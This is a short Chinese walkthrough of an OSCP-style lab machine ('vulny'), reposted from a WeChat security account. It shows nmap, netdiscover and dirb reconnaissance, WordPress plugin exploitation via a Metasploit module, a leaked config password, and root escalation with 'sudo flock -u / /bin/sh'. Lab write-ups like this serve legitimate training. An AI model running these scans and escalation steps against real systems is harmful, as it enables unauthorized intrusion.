OSCP 靶场
靶机简介
难度:简单
涉及:wordpress、sudo提权
信息收集
主机发现
nmap -sn 192.168.1.0/24
netdiscover -i eth1 -r 192.168.1.0/24
端口扫描
nmap -A -p- 192.168.1.150
目录扫描
dirb http://192.168.1.150
获取权限
目录扫描发现存在该插件,使用msf模块获取权限
获取几个交互shell
script /dev/null -c bash
权限提升
普通用户提权
通过信息收集我们发现存在adrian账号和一个flag,但是我们没有权限,所以需要进行adrian用户的提权
在配置文件中找到一个可疑字段,尝试登录后,成功登录adrian用户
idrinksomewater
root用户提权
sudo -l 可以看到使用/usr/bin/flock 命令不用root密码
https://gtfobins.github.io/gtfobins/flock/
sudo flock -u / /bin/sh
获取flag
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】vulny
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论